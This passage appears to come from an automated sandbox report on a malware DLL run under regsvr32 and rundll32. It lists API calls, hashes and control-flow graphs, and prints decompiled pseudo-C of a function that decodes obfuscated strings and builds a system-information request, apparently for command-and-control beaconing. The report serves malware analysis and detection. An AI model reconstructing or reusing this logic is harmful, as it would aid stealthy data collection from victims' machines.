                                                                                                                                                                                                                                    0x023e7cef
                                                                                                                                                                                                                                    0x023e7cf4
                                                                                                                                                                                                                                    0x023e7d02
                                                                                                                                                                                                                                    0x023e7d07
                                                                                                                                                                                                                                    0x023e7d11

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(004F0053,76D25520,?,00000008,04CC937C,?,023E747C,004F0053,04CC937C,?,?,?,?,?,?,023E6814), ref: 023E7CC8
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(023E747C,?,023E747C,004F0053,04CC937C,?,?,?,?,?,?,023E6814), ref: 023E7CCF
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,004F0053,76D269A0,?,?,023E747C,004F0053,04CC937C,?,?,?,?,?,?,023E6814), ref: 023E7CEF
                                                                                                                                                                                                                                    • memcpy.NTDLL(76D269A0,023E747C,00000002,00000000,004F0053,76D269A0,?,?,023E747C,004F0053,04CC937C), ref: 023E7D02
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2411391700-0
                                                                                                                                                                                                                                    • Opcode ID: 07ef3ee641482b9d072fc137f64c487aeaf8a5871510b8c7765b606bd7d05ff9
                                                                                                                                                                                                                                    • Instruction ID: ddc2ad882a95c94ad51294c27a2dd3ca62d3a1b81c048e0220bfeff5a055f78f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07ef3ee641482b9d072fc137f64c487aeaf8a5871510b8c7765b606bd7d05ff9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2F03C72900128BB8F21DFA9CC44CDF7BAEEF083547014062ED09D7151E631EA188BA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E3CC8, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(04CC87FA,00000000,00000000,73FCC740,023EA453,00000000), ref: 023E3CD8
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 023E3CE0
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,04CC87FA), ref: 023E3CF4
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 023E3CFF
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 74227042-0
                                                                                                                                                                                                                                    • Opcode ID: 9783443e3e46ce8a5ea6b2197efb8336621fd2f56c35273d238f6dade5829758
                                                                                                                                                                                                                                    • Instruction ID: ccd9283d3cc875f74be865a00d0437e225d677f1ee4955810edd154f0249f0f0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9783443e3e46ce8a5ea6b2197efb8336621fd2f56c35273d238f6dade5829758
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAE06DB3901224E78B219AE5AC48CAFBBADEE89721B044C17FA0097154C724CC188BA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Analysis Process: rundll32.exe PID: 1404 Parent PID: 2800 rundll32.exeCOMMON

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 031BADE5, Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 0 31bade5-31bae4a 1 31bae6b-31bae95 0->1 2 31bae4c-31bae66 0->2 3 31bae9a-31baea6 1->3 4 31bae97 1->4 10 31bb01b-31bb01f 2->10 6 31baeb9-31baebb 3->6 7 31baea8-31baeb3 3->7 4->3 8 31baf63-31baf6d 6->8 9 31baec1-31baec8 6->9 7->6 16 31baffe-31bb005 7->16 14 31baf79-31baf7b 8->14 15 31baf6f-31baf77 8->15 12 31baeca-31baed6 9->12 13 31baed8 9->13 12->13 27 31baf28-31baf34 12->27 24 31baee1-31baee5 13->24 17 31baff9-31baffc 14->17 18 31baf7d-31baf80 14->18 15->14 22 31bb019 16->22 23 31bb007-31bb014 16->23 17->16 19 31bafae-31bafbc 18->19 20 31baf82-31baf85 18->20 19->17 33 31bafbe-31bafce 19->33 20->19 26 31baf87-31baf92 20->26 22->10 23->22 24->27 28 31baee7-31baef7 24->28 26->19 29 31baf94-31baf9a 26->29 35 31baf5c 27->35 36 31baf36-31baf3a 27->36 38 31baef9-31baf05 28->38 39 31baf07-31baf23 28->39 29->19 32 31baf9c-31baf9f 29->32 32->19 37 31bafa1-31bafac 32->37 43 31bafda-31bafdc 33->43 44 31bafd0-31bafd8 33->44 35->8 36->8 40 31baf3c-31baf48 36->40 37->17 37->19 38->27 38->39 39->10 40->8 48 31baf4a-31baf5a 40->48 43->17 46 31bafde-31baff6 43->46 44->43 46->17 48->8
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                                    • API String ID: 0-3993045852
                                                                                                                                                                                                                                    • Opcode ID: 0d6bc532dd3603f94265a50da0cdad78e674673c34ddb561b1270d8f1e5428e6
                                                                                                                                                                                                                                    • Instruction ID: 21ab31a3fa309a3778954674fea0853346ddd06ff017b425435b42c18f48d353
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d6bc532dd3603f94265a50da0cdad78e674673c34ddb561b1270d8f1e5428e6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7812BB5A00605AFDB14DFA9D894AEEB7F9EF4C310F14812DE515D7240E770E945CB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B8B94, Relevance: .2, Instructions: 245COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 51 31b8b94-31b8ba6 52 31b8ba8 51->52 53 31b8bae-31b8c2c call 31b1c1a call 31b54bc 51->53 52->53 60 31b8c2e-31b8c4d 53->60 61 31b8c55-31b8c5f call 31b7649 53->61 60->61 65 31b8c61-31b8c7e 61->65 66 31b8c86-31b8ca0 call 31b9395 61->66 65->66 70 31b8e63-31b8e67 66->70 71 31b8ca6-31b8cbd 66->71 73 31b8e6f-31b8e76 70->73 74 31b8cc3-31b8d20 call 31b7a80 call 31b8307 71->74 75 31b8e57-31b8e5b 71->75 83 31b8e4b-31b8e4f 74->83 84 31b8d26-31b8d3d call 31b3cc8 74->84 75->70 83->75 88 31b8d43-31b8d7a call 31b809f 84->88 89 31b8e41-31b8e43 84->89 96 31b8e79-31b8e80 88->96 97 31b8d80-31b8d8e call 31b43df 88->97 89->83 98 31b8e2d call 31ba1b0 96->98 102 31b8dd2-31b8dd9 97->102 103 31b8d90-31b8d9e call 31b163f 97->103 104 31b8e32-31b8e3f 98->104 106 31b8ddb-31b8ddf 102->106 107 31b8de5-31b8de9 102->107 110 31b8da3-31b8dcd call 31b9039 103->110 104->89 109 31b8e16-31b8e22 call 31b9039 106->109 111 31b8de1 106->111 108 31b8deb-31b8df0 107->108 107->109 108->109 113 31b8df2-31b8e14 call 31b8f0a call 31b85db 108->113 109->104 119 31b8e24-31b8e2b 109->119 110->102 111->107 113->109 119->98 119->104
                                                                                                                                                                                                                                    C-Code - Quality: 24%
                                                                                                                                                                                                                                    			E031B8B94(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, unsigned int _a8, unsigned int* _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t84;
				intOrPtr* _t86;
				intOrPtr _t92;
				intOrPtr _t99;
				unsigned int _t103;
				signed int _t107;
				intOrPtr* _t108;
				intOrPtr* _t110;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr _t116;
				intOrPtr _t121;
				void* _t125;
				intOrPtr _t127;
				intOrPtr* _t128;
				void* _t129;
				void* _t138;
				void* _t139;
				void* _t140;
				intOrPtr _t141;
				intOrPtr _t143;
				void* _t144;
				intOrPtr* _t146;
				void* _t147;
				intOrPtr* _t148;
				intOrPtr* _t149;
				intOrPtr* _t152;
				void* _t153;
				void* _t155;

				_t138 = __edx;
				_t129 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					__imp__();
				}
				_t60 =  *0x31bd018; // 0x99d5691b
				asm("bswap eax");
				_t61 =  *0x31bd014; // 0x3a87c8cd
				_t127 = _a16;
				_t146 =  *0x31bd120; // 0x73fcc740
				asm("bswap eax");
				_t62 =  *0x31bd010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x31bd00c; // 0x62819102
				asm("bswap eax");
				_t64 =  *0x31bd27c; // 0x1faa5a8
				_t3 = _t64 + 0x31be633; // 0x74666f73
				_t139 =  *_t146(_t127, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0x31bd02c,  *0x31bd004, _t59);
				_t68 =  *0x31bd27c; // 0x1faa5a8
				_t4 = _t68 + 0x31be673; // 0x74707526
				_t71 =  *_t146(_t139 + _t127, _t4, E031B1C1A());
				_t155 = _t153 + 0x38;
				_t140 = _t139 + _t71; // executed
				_t72 = E031B54BC(_t129); // executed
				_t128 = __imp__; // 0x76d25520
				_v8 = _t72;
				if(_t72 != 0) {
					_t121 =  *0x31bd27c; // 0x1faa5a8
					_t7 = _t121 + 0x31be8eb; // 0x736e6426
					_t125 =  *_t146(_a16 + _t140, _t7, _t72);
					_t155 = _t155 + 0xc;
					_t140 = _t140 + _t125;
					 *_t128( *0x31bd238, 0, _v8);
				}
				_t73 = E031B7649();
				_v8 = _t73;
				if(_t73 != 0) {
					_t116 =  *0x31bd27c; // 0x1faa5a8
					_t11 = _t116 + 0x31be8f3; // 0x6f687726
					 *_t146(_t140 + _a16, _t11, _t73);
					_t155 = _t155 + 0xc;
					 *_t128( *0x31bd238, 0, _v8);
				}
				_t141 =  *0x31bd32c; // 0x51695b0
				_t75 = E031B9395(0x31bd00a, _t141 + 4);
				_t147 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					 *_t128( *0x31bd238, _t147, _a16); // executed
					return _v12;
				} else {
					__imp__( *0x31bd238, 0, 0x800);
					_v8 = _t75;
					if(_t75 == 0) {
						L25:
						 *_t128( *0x31bd238, _t147, _v20);
						goto L26;
					}
					__imp__();
					E031B7A80(_t75);
					_t80 =  *0x31bd32c; // 0x51695b0
					__imp__(_t80 + 0x40);
					asm("lock xadd [eax], ecx");
					_t84 =  *0x31bd32c; // 0x51695b0
					__imp__(_t84 + 0x40);
					_t86 =  *0x31bd32c; // 0x51695b0
					_t143 = E031B8307(1, _t138, _a16,  *_t86);
					_v28 = _t143;
					asm("lock xadd [eax], ecx");
					if(_t143 == 0) {
						L24:
						 *_t128( *0x31bd238, _t147, _v8);
						goto L25;
					}
					 *0x31bd104(_t143, 0x31bc2ac);
					_push(_t143);
					_t92 = E031B3CC8();
					_v16 = _t92;
					if(_t92 == 0) {
						L23:
						 *_t128( *0x31bd238, _t147, _t143);
						goto L24;
					}
					_t148 = __imp__; // 0x76d68170
					 *_t148(_t143, _a4);
					 *_t148(_v8, _v20);
					_t149 = __imp__; // 0x76d681d0
					 *_t149(_v8, _v16);
					 *_t149(_v8, _t143);
					_t99 = E031B809F(0, _v8);
					_a4 = _t99;
					if(_t99 == 0) {
						_v12 = 8;
						L21:
						E031BA1B0();
						L22:
						 *_t128( *0x31bd238, 0, _v16);
						_t147 = 0;
						goto L23;
					}
					_t103 = E031B43DF(_t128, 0xffffffffffffffff, _t143,  &_v24); // executed
					_v12 = _t103;
					if(_t103 == 0) {
						_t152 = _v24;
						_t107 = E031B163F(_t152, _a4, _a8, _a12); // executed
						_v12 = _t107;
						_t108 =  *((intOrPtr*)(_t152 + 8));
						 *((intOrPtr*)( *_t108 + 0x80))(_t108);
						_t110 =  *((intOrPtr*)(_t152 + 8));
						 *((intOrPtr*)( *_t110 + 8))(_t110);
						_t112 =  *((intOrPtr*)(_t152 + 4));
						 *((intOrPtr*)( *_t112 + 8))(_t112);
						_t114 =  *_t152;
						_t103 = E031B9039( *((intOrPtr*)( *_t114 + 8))(_t114), _t152);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t103 = _a8;
							if(_t103 != 0) {
								_t144 =  *_t103;
								_t150 =  *_a12;
								_push( *_a12);
								_push(_t144);
								_push(_t144);
								L031B8F0A();
								_t103 = E031B85DB(_t144, _t144, _t150 >> 1);
								_t143 = _v28;
								 *_a12 = _t103;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E031B9039(_t103, _a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}




















































                                                                                                                                                                                                                                    0x031b8b94
                                                                                                                                                                                                                                    0x031b8b94
                                                                                                                                                                                                                                    0x031b8b94
                                                                                                                                                                                                                                    0x031b8b9f
                                                                                                                                                                                                                                    0x031b8ba6
                                                                                                                                                                                                                                    0x031b8ba8
                                                                                                                                                                                                                                    0x031b8ba8
                                                                                                                                                                                                                                    0x031b8bb5
                                                                                                                                                                                                                                    0x031b8bc0
                                                                                                                                                                                                                                    0x031b8bc3
                                                                                                                                                                                                                                    0x031b8bc8
                                                                                                                                                                                                                                    0x031b8bcb
                                                                                                                                                                                                                                    0x031b8bd1
                                                                                                                                                                                                                                    0x031b8bd4
                                                                                                                                                                                                                                    0x031b8bd9
                                                                                                                                                                                                                                    0x031b8bdc
                                                                                                                                                                                                                                    0x031b8be1
                                                                                                                                                                                                                                    0x031b8be4
                                                                                                                                                                                                                                    0x031b8bf0
                                                                                                                                                                                                                                    0x031b8bfd
                                                                                                                                                                                                                                    0x031b8c05
                                                                                                                                                                                                                                    0x031b8c0a
                                                                                                                                                                                                                                    0x031b8c15
                                                                                                                                                                                                                                    0x031b8c17
                                                                                                                                                                                                                                    0x031b8c1a
                                                                                                                                                                                                                                    0x031b8c1c
                                                                                                                                                                                                                                    0x031b8c23
                                                                                                                                                                                                                                    0x031b8c29
                                                                                                                                                                                                                                    0x031b8c2c
                                                                                                                                                                                                                                    0x031b8c2f
                                                                                                                                                                                                                                    0x031b8c34
                                                                                                                                                                                                                                    0x031b8c41
                                                                                                                                                                                                                                    0x031b8c43
                                                                                                                                                                                                                                    0x031b8c49
                                                                                                                                                                                                                                    0x031b8c53
                                                                                                                                                                                                                                    0x031b8c53
                                                                                                                                                                                                                                    0x031b8c55
                                                                                                                                                                                                                                    0x031b8c5c
                                                                                                                                                                                                                                    0x031b8c5f
                                                                                                                                                                                                                                    0x031b8c62
                                                                                                                                                                                                                                    0x031b8c67
                                                                                                                                                                                                                                    0x031b8c74
                                                                                                                                                                                                                                    0x031b8c76
                                                                                                                                                                                                                                    0x031b8c84
                                                                                                                                                                                                                                    0x031b8c84
                                                                                                                                                                                                                                    0x031b8c86
                                                                                                                                                                                                                                    0x031b8c94
                                                                                                                                                                                                                                    0x031b8c99
                                                                                                                                                                                                                                    0x031b8c9d
                                                                                                                                                                                                                                    0x031b8ca0
                                                                                                                                                                                                                                    0x031b8e63
                                                                                                                                                                                                                                    0x031b8e6d
                                                                                                                                                                                                                                    0x031b8e76
                                                                                                                                                                                                                                    0x031b8ca6
                                                                                                                                                                                                                                    0x031b8cb2
                                                                                                                                                                                                                                    0x031b8cba
                                                                                                                                                                                                                                    0x031b8cbd
                                                                                                                                                                                                                                    0x031b8e57
                                                                                                                                                                                                                                    0x031b8e61
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b8e61
                                                                                                                                                                                                                                    0x031b8cc3
                                                                                                                                                                                                                                    0x031b8cc9
                                                                                                                                                                                                                                    0x031b8cce
                                                                                                                                                                                                                                    0x031b8cd7
                                                                                                                                                                                                                                    0x031b8ce8
                                                                                                                                                                                                                                    0x031b8cec
                                                                                                                                                                                                                                    0x031b8cf5
                                                                                                                                                                                                                                    0x031b8cfb
                                                                                                                                                                                                                                    0x031b8d0a
                                                                                                                                                                                                                                    0x031b8d11
                                                                                                                                                                                                                                    0x031b8d1a
                                                                                                                                                                                                                                    0x031b8d20
                                                                                                                                                                                                                                    0x031b8e4b
                                                                                                                                                                                                                                    0x031b8e55
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b8e55
                                                                                                                                                                                                                                    0x031b8d2c
                                                                                                                                                                                                                                    0x031b8d32
                                                                                                                                                                                                                                    0x031b8d33
                                                                                                                                                                                                                                    0x031b8d3a
                                                                                                                                                                                                                                    0x031b8d3d
                                                                                                                                                                                                                                    0x031b8e41
                                                                                                                                                                                                                                    0x031b8e49
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b8e49
                                                                                                                                                                                                                                    0x031b8d46
                                                                                                                                                                                                                                    0x031b8d4d
                                                                                                                                                                                                                                    0x031b8d55
                                                                                                                                                                                                                                    0x031b8d5a
                                                                                                                                                                                                                                    0x031b8d63
                                                                                                                                                                                                                                    0x031b8d69
                                                                                                                                                                                                                                    0x031b8d70
                                                                                                                                                                                                                                    0x031b8d77
                                                                                                                                                                                                                                    0x031b8d7a
                                                                                                                                                                                                                                    0x031b8e79
                                                                                                                                                                                                                                    0x031b8e2d
                                                                                                                                                                                                                                    0x031b8e2d
                                                                                                                                                                                                                                    0x031b8e32
                                                                                                                                                                                                                                    0x031b8e3d
                                                                                                                                                                                                                                    0x031b8e3f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b8e3f
                                                                                                                                                                                                                                    0x031b8d84
                                                                                                                                                                                                                                    0x031b8d8b
                                                                                                                                                                                                                                    0x031b8d8e
                                                                                                                                                                                                                                    0x031b8d93
                                                                                                                                                                                                                                    0x031b8d9e
                                                                                                                                                                                                                                    0x031b8da3
                                                                                                                                                                                                                                    0x031b8da6
                                                                                                                                                                                                                                    0x031b8dac
                                                                                                                                                                                                                                    0x031b8db2
                                                                                                                                                                                                                                    0x031b8db8
                                                                                                                                                                                                                                    0x031b8dbb
                                                                                                                                                                                                                                    0x031b8dc1
                                                                                                                                                                                                                                    0x031b8dc4
                                                                                                                                                                                                                                    0x031b8dcd
                                                                                                                                                                                                                                    0x031b8dcd
                                                                                                                                                                                                                                    0x031b8dd9
                                                                                                                                                                                                                                    0x031b8de5
                                                                                                                                                                                                                                    0x031b8de9
                                                                                                                                                                                                                                    0x031b8deb
                                                                                                                                                                                                                                    0x031b8df0
                                                                                                                                                                                                                                    0x031b8df2
                                                                                                                                                                                                                                    0x031b8df7
                                                                                                                                                                                                                                    0x031b8df9
                                                                                                                                                                                                                                    0x031b8dfa
                                                                                                                                                                                                                                    0x031b8dfb
                                                                                                                                                                                                                                    0x031b8dfc
                                                                                                                                                                                                                                    0x031b8e09
                                                                                                                                                                                                                                    0x031b8e11
                                                                                                                                                                                                                                    0x031b8e14
                                                                                                                                                                                                                                    0x031b8e14
                                                                                                                                                                                                                                    0x031b8df0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b8ddb
                                                                                                                                                                                                                                    0x031b8ddf
                                                                                                                                                                                                                                    0x031b8e16
                                                                                                                                                                                                                                    0x031b8e19
                                                                                                                                                                                                                                    0x031b8e22
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b8e22
                                                                                                                                                                                                                                    0x031b8de1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b8de1
                                                                                                                                                                                                                                    0x031b8dd9

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 8b4136f8c6aa4fd39d1cea170d29073ee0ff17a97f096106fc407236867b4f01
                                                                                                                                                                                                                                    • Instruction ID: b3e0e31f6f21930f8df31dd0afaf0550ba042caf5ac1afcbb3c3ce53116186fd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b4136f8c6aa4fd39d1cea170d29073ee0ff17a97f096106fc407236867b4f01
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D915B75900248EFCB19EFA9EC84A9EBBB9EF4C750F144055F448E7260EB31D991DB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B12D4, Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 126 31b12d4-31b1306 128 31b157b-31b1582 126->128 129 31b130c-31b132a 126->129 131 31b156b-31b156f 129->131 132 31b1330-31b1359 call 31ba7bc call 31b95b1 129->132 131->128 137 31b155b-31b155f 132->137 138 31b135f-31b1384 132->138 137->131 140 31b13aa-31b140e 138->140 141 31b1386-31b139d 138->141 146 31b1559 140->146 147 31b1414-31b142d 140->147 141->140 146->137 149 31b1476-31b1478 147->149 150 31b147a 149->150 151 31b142f-31b1436 149->151 152 31b147e-31b1484 150->152 155 31b143f-31b1441 151->155 153 31b1486-31b148c 152->153 154 31b1494 152->154 156 31b1492 153->156 157 31b1530-31b1538 153->157 158 31b149e-31b14be 154->158 159 31b1496-31b149c 154->159 160 31b1469-31b1473 155->160 161 31b1443-31b1466 155->161 156->154 163 31b1543-31b1547 157->163 169 31b14c9-31b14cc 158->169 170 31b14c0-31b14c5 158->170 159->158 162 31b14eb-31b14f2 159->162 160->149 161->160 168 31b14fb-31b14fd 162->168 164 31b153a-31b153c 163->164 165 31b1549-31b154c 163->165 171 31b153e-31b1540 164->171 172 31b1542 164->172 175 31b1555-31b1557 165->175 173 31b14ff-31b1510 168->173 174 31b1513-31b1526 168->174 177 31b14ce-31b14d0 169->177 178 31b14d1-31b14e8 call 31b5544 169->178 170->169 176 31b14c7 170->176 171->172 172->163 173->174 174->162 184 31b1528-31b152b 174->184 175->131 176->169 177->178 178->162 184->152
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 44c3e3a2fb093bf37641982dd05cc8a6c4bbec2090fbf5fcaabe32e2ba0889d1
                                                                                                                                                                                                                                    • Instruction ID: a4d3953066313405d996797c1d2a7d5fc78257058675115c559626343985d403
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44c3e3a2fb093bf37641982dd05cc8a6c4bbec2090fbf5fcaabe32e2ba0889d1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E48159B5D00209AFDF15DFA5DC84AEEBBB9FF4C300F1541AAE545E6250E7309A84CBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B225B, Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
